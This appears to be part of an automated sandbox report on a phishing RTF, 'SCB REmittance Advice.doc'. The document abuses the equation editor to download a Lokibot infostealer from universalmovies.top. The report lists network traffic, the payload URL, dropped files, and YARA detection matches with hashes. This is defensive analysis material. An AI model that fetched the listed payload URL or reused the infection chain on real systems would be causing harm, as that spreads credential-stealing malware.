                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QfH%2F2BVpjSen2eyktv1BYCPUDFXtQxn3KpP4F9EwmF%2FpGNJP2lvbmrqIFTdvNpzHn%2FBGQTrQ%2B0xCYfbEmd%2BFuH1ZDtC6xk%2Ba1bxlgSfloXz3%2BWCmJCVyI5dcMleVAFZYoG19"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870da3a9d48c75-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BFhwP2H%2BOS5aCEOLuYOThMMa498qI5eWf%2F2BIAL1yiv305Hw2OBPHrpxDwvW4BkBMFGYJ5FrrQU3pkrBQ%2FGu75qS0HnDCSqOaLgZlfCr5YxGUkSfVMA9mYI%2Fqq%2BFaN7NnmOR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870da92fb77288-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i1k06TqmMpfmAdQ55cmQPUDY0UHc8UvEa%2FqwjX4bImXFfZsrXLkcVsGptiCFg5xqG128v6YYH%2F7IUm5HHJiX3MDbv8QxFpcWAHiFmQEh%2BJlGNSxMcEZKxTaDeGCXTbK982PN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870dadfe3641ed-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348345473.0000000000634000.00000004.00000020.00020000.00000000.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348345473.0000000000634000.00000004.00000020.00020000.00000000.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348345473.0000000000634000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: sharon38892.exe, 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, XxENUzWteJXT.exe, 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
                  Source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.drString found in binary or memory: http://tempuri.org/registerationDataSet.xsdOAsnanyDentalClinic.Properties.Resources
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: XxENUzWteJXT.exe, XxENUzWteJXT.exe, 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.000000000061F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/sharonzx.exe
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/sharonzx.exej
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/sharonzx.exemmC:
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/sharonzx.exeoC:
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348345473.0000000000634000.00000004.00000020.00020000.00000000.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                  Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49163 version: TLS 1.2

                  System Summary

                  barindex
                  Source: SCB REmittance Advice.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                  Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: Process Memory Space: sharon38892.exe PID: 2912, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: Process Memory Space: XxENUzWteJXT.exe PID: 3472, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: Process Memory Space: XxENUzWteJXT.exe PID: 3796, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: Screenshot number: 4Screenshot OCR: Enable editing from the yellow bar above.The independent auditors' opinion says the financial state
                  Source: sharonzx[1].exe.2.dr, BufferingPage.csLong String: Length: 150953
                  Source: sharon38892.exe.2.dr, BufferingPage.csLong String: Length: 150953
                  Source: XxENUzWteJXT.exe.5.dr, BufferingPage.csLong String: Length: 150953
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\sharon38892.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_002553485_2_00255348
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_002504B45_2_002504B4
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_002558085_2_00255808
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_002598795_2_00259879
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_00251A105_2_00251A10
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_00251E8B5_2_00251E8B
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_002591505_2_00259150
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_0025D2185_2_0025D218
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_002553445_2_00255344
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_002523585_2_00252358
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_0025C4A05_2_0025C4A0
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_0025C8F85_2_0025C8F8
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_0025DCF05_2_0025DCF0
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_0025CD205_2_0025CD20
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_0025CD305_2_0025CD30
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_00250D785_2_00250D78
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_00251E035_2_00251E03
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_00251E185_2_00251E18
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_0017534814_2_00175348
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_001704B414_2_001704B4
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_0017580814_2_00175808
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_0017987914_2_00179879
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_00171A1014_2_00171A10
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_00171E8B14_2_00171E8B
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_0017915014_2_00179150
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_0017D21814_2_0017D218
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_0017235814_2_00172358
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_0017534414_2_00175344
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_0017C4A014_2_0017C4A0
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_0017C8F814_2_0017C8F8
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_0017C8E914_2_0017C8E9
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_0017DCF014_2_0017DCF0
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_0017CD3014_2_0017CD30
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_0017CD2014_2_0017CD20
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_00170D7814_2_00170D78
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_00171E1814_2_00171E18
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_00171E0314_2_00171E03
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 21_2_0040549C21_2_0040549C
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 21_2_004029D421_2_004029D4
                  Source: tmp5C05.tmp.5.drOLE indicator, VBA macros: true
                  Source: tmp7D2B.tmp.14.drOLE indicator, VBA macros: true
                  Source: tmp5C05.tmp.5.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: tmp7D2B.tmp.14.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: String function: 0041219C appears 45 times
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: String function: 00405B6F appears 42 times
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
                  Source: SCB REmittance Advice.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
